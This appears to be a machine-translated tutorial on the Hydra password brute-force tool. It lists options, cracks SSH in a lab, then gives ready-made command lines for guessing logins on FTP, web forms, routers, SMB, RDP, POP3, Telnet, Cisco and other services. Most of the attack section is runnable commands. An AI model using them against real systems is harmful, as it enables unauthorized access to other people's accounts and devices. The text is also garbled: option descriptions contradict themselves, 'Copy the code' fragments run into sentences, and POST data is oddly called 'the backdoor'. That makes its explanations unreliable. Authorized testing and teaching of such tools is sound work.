Hydra hydra

Remember hydra, captain America’s villain?

This penetration testing tool introduced today is also called that.

Hydra is a well-known organization THC’s open source brute force password tools, very powerful

Kali is installed by default and supports online cracking of almost all protocols.

Whether a password can be cracked depends on the power of the dictionary and the performance of the computer.

Let’s just talk about how this thing works, okay

Method of use

Syntax: Hydra parameter IP serviceCopy the code

-l file Uppercase: indicates the user name dictionary of the specified user. -p pass Lowercase: indicates the password dictionary. The password dictionary is rarely used. -p file Uppercase, used to specify the password dictionary. -e ns Additional options: n: empty password test, s: use the specified account and password test. -m file Specifies the target IP address list file to crack in batches. -o file Specifies the output file. -f Stops cracking when the first pair of login names or passwords are found. -t Tasks Specifies the number of concurrent threads running. Default is 16. -w time Specifies the maximum timeout period in units -v / -v displays detailed processes. Run the hydra -r /path/to/hydra.restore command to continue the task next time.) -x Specifies the password.Copy the code

Service: specifies the name of the service. Supported services and protocols include Telnet, FTP, POP3, and so on. Note: 1. Create your own dictionary, and then put in the current directory or specified directory. 2. The parameters can be placed at the end in a format such as hydra IP service parameters. 3. If you can determine the user name, for example, to crack the web login, use -l to crack the password. 4. Disadvantages, if the target website login need verification code can not be cracked. 5. Man Hydra 6. Check the help information, such as hydra -u http-form.Copy the code

Case analysis

Break the SSH login password

Environment introduction

Hydra tool is installed on Kali target drone: 192.168.154.131 SSH service is installed and running properlyCopy the code

For testing purposes, we create two simple dictionary files, as follows:

Start blasting

According to the command parameters, the organization parameter format is as follows:

root@kali:/mnt# hydra -l user. TXT -p password. TXT -t 2 -vv -e ns 192.168.154.131 SSHCopy the code

Successful cracking

Because of the small number of dictionaries, we can easily crack it, but in practice, it may take a long time.

Test the login

Log in to the server using the obtained user name and password

All kinds of protocol cracking summary

FTP Protocol cracking

To crack FTP, run the hydra -l user name dictionary -p password dictionary -t 6 -e NS IP address -v commandCopy the code

HTTP Protocol cracking

Get submission to crack web login: Hydra -l User name dictionary -p password dictionary -t thread -v -e NS IP address http-get /admin/ Hydra -l User name dictionary -p password dictionary -t thread -v -e ns -f IP address http-get Hydra -f -l User name -p Password dictionary -v -s 9900 IP address http-post-form "/admin/index.php? Action = login: user = USER&pw = PASS: "# / index. PHP... This is the login URL # the backdoor is the POST data where the USER name and password are USER PASS instead of # and then the characters that will occur if the login fails... And started crackingCopy the code

HTTPS Protocol cracking

Decrypt HTTPS hydra -m /index.php -l user name -p Password dictionary. TXT IP address HTTPSCopy the code

Router cracking

hydra -l admin -x 6:10:1a.~! @#$%^&()-= -t 8 192.168.1.1 HTTP -get / -l admin is the user name to try to crack. # -x 6:10:1a. The enumerated password consists of digits, lowercase letters, single character '.', and so on, and is 6-10 characters long. -t 8 Indicates that eight parallel tasks are divided into eight blasting attempts. 192.168.1.1 is the Router address. Http-get is the cracking mode (protocol)Copy the code

The HTTP-proxy protocol is cracked

Decrypt http-proxy: hydra -l admin -p dictionary. TXT http-proxy://IP addressCopy the code

SMB crack

Crack SMB: hydra -l User name dictionary -p Password dictionary IP address SMBCopy the code

Windows Remote Desktop

Crack RDP (Windows Remote login) : Hydra IP address RDP -l administrator -p password dictionary. TXT -vCopy the code

Email pop3

Decrypt mailbox pop3: hydra -l user name -p Password dictionary. TXT my.pop3.mail pop3Copy the code

Telnet crack

Hydra IP address Telnet -l user dictionary TXT -p Password dictionary TXT -t 32 -s 23 -e ns -f -vCopy the code

Teamspeak

Hydra -l User name dictionary -p Password dictionary. TXT -s port number -vv IP teamspeakCopy the code

cisco

Hydra -p Password dictionary IP address Cisco Hydra -m cloud -p Password dictionary IP address cisco-enableCopy the code